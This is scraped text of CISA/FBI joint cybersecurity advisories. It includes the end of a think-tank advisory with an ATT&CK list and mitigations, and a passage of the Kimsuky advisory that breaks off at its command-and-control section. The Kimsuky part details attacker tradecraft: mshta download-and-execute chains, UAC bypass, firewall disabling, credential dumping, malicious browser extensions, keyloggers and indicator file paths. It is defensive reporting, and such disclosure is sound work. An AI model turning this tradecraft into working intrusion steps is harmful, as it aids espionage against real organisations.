<li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]</li>
<li><i>Use Alternate Authentication Material: Application Access Token</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/001″>T1550.001</a>]</li>
<li><i>Subvert Trust Controls: Code Signing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1553/002″>T1553.002</a>]</li>
<li><i>Impair Defenses: Disable or Modify Tools</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/001″>T1562.001</a>]</li>
<li><i>Impair Defenses: Disable or Modify System Firewall</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004″>T1562.004</a>]</li>
<li><i>Hide Artifacts: Hidden Files and Directories </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1564/001″>T1564.001</a>]</li>
<li><i>Hide Artifacts: Hidden Window</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1564/003″>T1564.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Credential Access</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0006″>TA0006</a>]
<ul>
<li><i>OS Credential Dumping: LSASS Memory</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/001″>T1003.001</a>]</li>
<li><i>OS Credential Dumping: Security Account Manager </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/002″>T1003.002</a>]</li>
<li><i>OS Credential Dumping: NTDS</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/003″>T1003.003</a>]</li>
<li><i>OS Credential Dumping: LSA Secrets</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/004″>T1003.004</a>]</li>
<li><i>OS Credential Dumping: Cached Domain Credentials</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/005″>T1003.005</a>]</li>
<li><i>Network Sniffing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040″>T1040</a>]</li>
<li><i>Input Capture: Keylogging</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001″>T1056.001</a>]</li>
<li><i>Brute Force: Password Cracking</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1110/002″>T1110.002</a>]<i>Brute Force: Password Spraying</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1110/003″>T1110.003</a>]</li>
<li><i>Forced Authentication</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1187″>T1187</a>]</li>
<li><i>Steal Application Access Token</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1528″>T1528</a>]</li>
<li><i>Unsecured Credentials: Credentials in Files</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1552/001″>T1552.001</a>]</li>
<li><i>Unsecured Credentials: Group Policy Preferences</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1552/006″>T1552.006</a>]</li>
<li><i>Credentials from Password Stores: Credentials from Web Browsers</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1555/003″>T1555.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Discovery</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0007″>TA0007</a>]
<ul>
<li><i>System Service Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1007″>T1007</a>]</li>
<li><i>Query Registry</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1012″>T1012</a>]</li>
<li><i>System Network Configuration Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1016″>T1016</a>]</li>
<li><i>Remote System Discovery </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1018″>T1018</a>]</li>
<li><i>System Owner/User Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1033″>T1033</a>]</li>
<li><i>Network Sniffing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040″>T1040</a>]</li>
<li><i>Network Service Scanning</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1046″>T1046</a>]</li>
<li><i>System Network Connections Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1049″>T1049</a>]</li>
<li><i>Process Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1057″>T1057</a>]</li>
<li><i>Permission Groups Discovery: Local Groups</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1069/001″>T1069.001</a>]</li>
<li><i>Permission Groups Discovery: Domain Groups</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1069/002″>T1069.002</a>]</li>
<li><i>System Information Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1082″>T1082</a>]</li>
<li><i>File and Directory Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1083″>T1083</a>]</li>
<li><i>Account Discovery: Local Account</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1087/001″>T1087.001</a>]</li>
<li><i>Account Discovery: Domain Account</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1087/002″>T1087.002</a>]</li>
<li><i>Peripheral Device Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1120″>T1120</a>]</li>
<li><i>Network Share Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1135″>T1135</a>]</li>
<li><i>Password Policy Discovery </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1201/”>T1201</a>]</li>
<li><i>Software Discovery: Security Software Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1518/001″>T1518.001</a>]</li>
</ul>
</li>
<li><i><em><strong>Lateral Movement </strong></em></i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0008″>TA0008</a>]
<ul>
<li><i>Remote Services: Remote Desktop Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/001″>T1021.001</a>]</li>
<li><i>Remote Services: SSH </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/004″>T1021.004</a>]</li>
<li><i>Taint Shared Content </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1080/”>T1080</a>]</li>
<li><i>Replication Through Removable Media </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1091″>T1091</a>]</li>
<li><i>Exploitation of Remote Services</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1210″>T1210</a>]</li>
<li><i>Use Alternate Authentication Material: Pass the Hash </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/002″>T1550.002</a>]</li>
<li><i>Use Alternate Authentication Material: Pass the Ticket</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/003″>T1550.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Collection</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0009″>TA0009</a>]
<ul>
<li><i>Data from Local System</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1005″>T1005</a>]</li>
<li><i>Data from Removable Media</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1025″>T1025</a>]</li>
<li><i>Data Staged: Local Data Staging</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1074/001″>T1074.001</a>]</li>
<li><i>Screen Capture</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1113″>T1113</a>]</li>
<li><i>Email Collection: Local Email Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/001″>T1114.001</a>]</li>
<li><i>Email Collection: Remote Email Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/002″>T1114.002</a>]</li>
<li><i>Automated Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1119″>T1119</a>]</li>
<li><i>Audio Capture</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1123″>T1123</a>]</li>
<li><i>Data from Information Repositories: SharePoint </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1213/002″>T1213.002</a>]</li>
<li><i>Archive Collected Data: Archive via Utility</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560/001″>T1560.001</a>]</li>
<li><i>Archive Collected Data: Archive via Custom Method</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560/003″>T1560.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Command and Control</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0011″>TA0011</a>]
<ul>
<li><i>Data Obfuscation: Junk Data</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1001/001/”>T1001.001</a>]</li>
<li><i>Fallback Channels</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1008″>T1008</a>]</li>
<li><i>Application Layer Protocol: Web Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/001″>T1071.001</a>]</li>
<li><i>Application Layer Protocol: File Transfer Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/002″>T1071.002</a>]</li>
<li><i>Application Layer Protocol: Mail Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/003″>T1071.003</a>]</li>
<li><i>Application Layer Protocol: DNS</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/004″>T1071.004</a>]</li>
<li><i>Proxy: External Proxy</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/002″>T1090.002</a>]</li>
<li><i>Proxy: Multi-hop Proxy</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/003″>T1090.003</a>]</li>
<li><i>Proxy: Domain Fronting</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/004″>T1090.004</a>]</li>
<li><i>Communication Through Removable Media</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1092″>T1092</a>]</li>
<li><i>Non-Application Layer Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1095″>T1095</a>]</li>
<li><i>Web Service: Dead Drop Resolver</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1102/001″>T1102.001</a>]</li>
<li><i>Web Service: Bidirectional Communication</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1102/002″>T1102.002</a>]</li>
<li><i>Multi-Stage Channels</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1104″>T1104</a>]</li>
<li><i>Ingress Tool Transfer</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1105″>T1105</a>]</li>
<li><i>Data Encoding: Standard Encoding</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1132/001″>T1132.001</a>]</li>
<li><i>Remote Access Software</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1219″>T1219</a>]</li>
<li><i>Dynamic Resolution: Domain Generation Algorithms</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1568/002″>T1568.002</a>]</li>
<li><i>Non-Standard Port</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1571″>T1571</a>]</li>
<li><i>Protocol Tunneling</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1572″>T1572</a>]</li>
<li><i>Encrypted Channel: Symmetric Cryptography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/001″>T1573.001</a>]</li>
<li><i>Encrypted Channel: Asymmetric Cryptography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/002″>T1573.002</a>]</li>
</ul>
</li>
<li><i><em><strong><span style=”display: none;”> </span>Exfiltration</strong> </em></i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0010″>TA0010</a>]
<ul>
<li><i>Exfiltration Over C2 Channel</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1041″>T1041</a>]</li>
<li><i>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1048/003″>T1048.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Impact </strong></em></i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0040″>TA0040</a>]
<ul>
<li><i>Data Encrypted for Impact</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1486″>T1486</a>]</li>
<li><i>Resource Hijacking</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1496″>T1496</a>]</li>
<li><i>System Shutdown/Reboot</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1529″>T1529</a>]</li>
<li><i>Disk Wipe: Disk Structure Wipe</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1561/002″>T1561.002</a>]</li>
</ul>
</li>
</ul>
<h3>Mitigations</h3><p>CISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.</p>
<h4>Leaders</h4>
<ul>
<li>Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.</li>
</ul>
<h4>Users/Staff</h4>
<ul>
<li>Log off remote connections when not in use.</li>
<li>Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).</li>
<li>Use different passwords for corporate and personal accounts.</li>
<li>Install antivirus software on personal devices to automatically scan and quarantine suspicious files.</li>
<li>Employ strong multi-factor authentication for personal accounts, if available.</li>
<li>Exercise caution when:
<ul>
<li>Opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href=”https://www.us-cert.gov/ncas/tips/ST04-010″>Using Caution with Email Attachments</a>.</li>
<li>Using removable media (e.g., USB thumb drives, external drives, CDs).</li>
</ul>
</li>
</ul>
<h4>IT Staff/Cybersecurity Personnel</h4>
<ul>
<li>Segment and segregate networks and functions.</li>
<li>Change the default username and password of applications and appliances.</li>
<li>Employ strong multi-factor authentication for corporate accounts.</li>
<li>Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.</li>
<li>Apply encryption to data at rest and data in transit.</li>
<li>Use email security appliances to scan and remove malicious email attachments or links.</li>
<li>Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.</li>
<li>Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-183a”>Defending Against Malicious Cyber Activity Originating from Tor</a> for mitigation options and additional information.</li>
<li>Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI’s <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-133a”>Top 10 Routinely Exploited Vulnerabilities</a> and other CISA alerts that identify vulnerabilities exploited by foreign attackers.</li>
<li>Implement an antivirus program and a formalized patch management process.</li>
<li>Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).</li>
<li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li>
<li>Implement Group Policy Object and firewall rules.</li>
<li>Implement filters at the email gateway and block suspicious IP addresses at the firewall.</li>
<li>Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.</li>
<li>Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.</li>
<li>Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.</li>
<li>Disable or block unnecessary remote services.</li>
<li>Limit access to remote services through centrally managed concentrators.</li>
<li>Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.</li>
<li>Limit unnecessary lateral communications.</li>
<li>Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.</li>
<li>Ensure applications do not store sensitive data or credentials insecurely.</li>
<li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li>
<li>Disable unnecessary services on agency workstations and servers.</li>
<li>Scan for and remove suspicious email attachments; ensure any scanned attachment is its “true file type” (i.e., the extension matches the file header).</li>
<li>Monitor users’ web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.</li>
<li>Visit the MITRE ATT&CK techniques and tactics pages linked in the ATT&CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.</li>
</ul>
<h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href=”https://us-cert.cisa.govmailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.gov”>Central@cisa.gov</a>.</p>
<h3>References</h3>
<ul>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-120a”>CISA Alert: Microsoft Office 365 Security Recommendations</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li><a href=”https://www.cisa.gov/telework”>CISA Webpage: Telework Guidance</a></li>
<li><a href=”https://www.cisa.gov/vpn-related-guidance”>CISA Webpage: VPN-Related Guidance</a></li>
<li><a href=”http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf”>FBI Private Industry Notification: PIN 20200409-001</a></li>
</ul>
<h3>References</h3>
<ul> <li><a href=”https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/”>[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks</a></li> </ul> <h3>Revisions</h3>
<ul> <li>Initial Version: December 1, 2020</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>
</div>
AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and …
AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector
Original release date: October 28, 2020SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and …
AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky
Original release date: October 27, 2020
Summary
This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.
This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group Kimsuky—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.
This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.
Click here for a PDF version of this report.
Key Findings
This advisory’s key findings are:
- The Kimsuky APT group has most likely been operating since 2012.
- Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
- Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[1],[2]
- Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[3]
- Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
- Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
- Kimsuky specifically targets:
- CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.
Technical Details
Initial Access
Kimsuky uses various spearphishing and social engineering methods to obtain Initial Access [TA0001] to victim networks.[9],[10],[11] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [T1566.001]).[12],[13]
- The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
- Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
- Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
- After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
- Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[15],[16],[17]
Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (Phishing: Spearphising Link [T1566.002], Drive-by Compromise [T1189], Man-in-the-Browser [T1185]).[18]
Execution
After obtaining initial access, Kimsuky uses BabyShark malware and PowerShell or the Windows Command Shell for Execution [TA0002].
- BabyShark is Visual Basic Script (VBS)-based malware.
- First, the compromised host system uses the native Microsoft Windows utility,
mshta.exe
, to download and execute an HTML application (HTA) file from a remote system (Signed Binary Proxy Execution: Mshta [T1218.005]). - The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
- The script maintains Persistence [TA0003] by creating a Registry key that runs on startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]).
- It then collects system information (System Information Discovery [T1082]), sends it to the operator’s command control (C2) servers, and awaits further commands.[19],[20],[21],[22]
- First, the compromised host system uses the native Microsoft Windows utility,
- Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (Phishing: Spearphising Link [T1566.002], Phishing: Spearphishing Attachment [T1566.001]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[23]
- Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (Command and Scripting Interpreter: PowerShell [T1059.001]). PowerShell commands/scripts can be executed without invoking
powershell.exe
through HTA files ormshta.exe
.[24],[25],[26],[27]
Persistence
Kimsuky has demonstrated the ability to establish Persistence [TA0003] through using malicious browser extensions, modifying system processes, manipulating the autostart
execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.
- In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (Man-in-the-Browser [T1185]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[28]
- Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (Boot or Logon Autostart Execution [T1547]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[29],[30]
- During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (Remote Services: Remote Desktop Protocol [T1021.001]).[31]
- Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (
.hwp
files) in the Registry (Event Triggered Execution: Change Default File Association [T1546.001]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[32] Kimsuky also targets Microsoft Office users by formatting their documents in a.docx
file rather than.hwp
and will tailor their macros accordingly.[33] - Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (Server Software Component: Web Shell [T1505.003]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]
Privilege Escalation
Kimsuky uses well-known methods for Privilege Escalation [TA0004]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in explorer.exe
.
- Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into
explorer.exe
(Process Injection [T1055]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g.,dfe8b437dd7c417a6d.tmp
) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[35] - Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within
explorer.exe
(Process Injection [T1055]).[36]
Figure 1: Privileges set for the injection [37]
Defense Evasion
Kimsuky uses well-known and widely available methods for Defense Evasion [TA0005] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[38],[39]
- Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (Impair Defenses: Disable or Modify System Firewall [T1562.004]).[40]
Figure 2: Disabled firewall values in the Registry [41]
- Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (Indicator Removal on Host: File Deletion [T1070.004]).[42]
- Kimsuky has used
mshta.exe
, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious.hta
files and JavaScript or VBS through a trusted windows utility (Signed Binary Proxy Execution: Mshta [T1218.005]). It can also be used to bypass application allow listing solutions (Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]).[43],[44] - Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (Process Injection [T1055]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[45],[46],[47]
Credential Access
Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (Credential Access [TA0006]).
- Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses
ProcDump
, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (OS Credential Dumping [T1003]).ProcDump
monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion ofProcDump
in the BabyShark malware.[48] - According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (Man-in-the-Browser [T1185]).[49],[50] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named
jQuery.js
, from a separate site (see figure 3).[51]
Figure 3: JavaScript file, named jQuery.js
[52]
- Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (Input Capture: Keylogging [T1056.001], Network Sniffing [T1040]). MECHANICAL logs keystrokes to
%userprofile%\appdata\roaming\apach.{txt,log}
and is also a “cryptojacker,” which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[53] - Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]
Discovery
Kimsuky enumerates system information and the file structure for victims’ computers and networks (Discovery [TA0007]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (File and Directory Discovery [T1083]). The information is directed to C:\WINDOWS\msdatl3.inc
, read by malware, and likely emailed to the malware’s command server.[55]
Collection
Kimsuky collects data from the victim system through its HWP document malware and its keylogger (Collection [TA0009]). The HWP document malware changes the default program association in the Registry to open HWP documents (Event Triggered Execution: Change Default File Association [T1546.001]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to C:\Program Files\Common Files\System\Ole DB\msolui80.inc
and records the active window name where the user pressed keys (Input Capture: Keylogging [T1056.001]). There is another keylogger variant that logs keystrokes into C:\WINDOWS\setup.log
.[56]
Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php
(see figure 4).
Figure 4: Python Script targeting MacOS [57]
Command and Control
